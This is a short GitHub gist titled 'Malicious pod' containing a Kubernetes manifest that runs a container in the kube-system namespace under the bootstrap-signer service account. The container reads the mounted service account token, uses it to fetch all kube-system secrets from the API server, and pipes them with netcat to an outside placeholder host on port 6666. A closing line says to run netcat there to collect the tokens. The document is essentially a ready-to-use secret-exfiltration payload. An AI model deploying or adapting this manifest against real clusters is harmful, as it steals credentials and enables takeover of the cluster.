Skip to content

Instantly share code, notes, and snippets.

@marcinguy
Last active August 19, 2019 14:53
Show Gist options
  • Save marcinguy/3991f1dcfa6ed96aa14c0e510622586a to your computer and use it in GitHub Desktop.
Save marcinguy/3991f1dcfa6ed96aa14c0e510622586a to your computer and use it in GitHub Desktop.
Malicious pod
malicious-pod.yaml
::::::::::::::
apiVersion: v1
kind: Pod
metadata:
name: alpine
namespace: kube-system
spec:
containers:
- name: alpine
image: alpine
command: ["/bin/sh"]
args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://<masternode>:443/api/v1/namespaces/kube-system/secrets; } | nc -nv <somethingreachable> 6666; sleep 100000']
serviceAccountName: bootstrap-signer
automountServiceAccountToken: true
hostNetwork: true
Run netcat on <somethingreachable> and you get the tokens
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment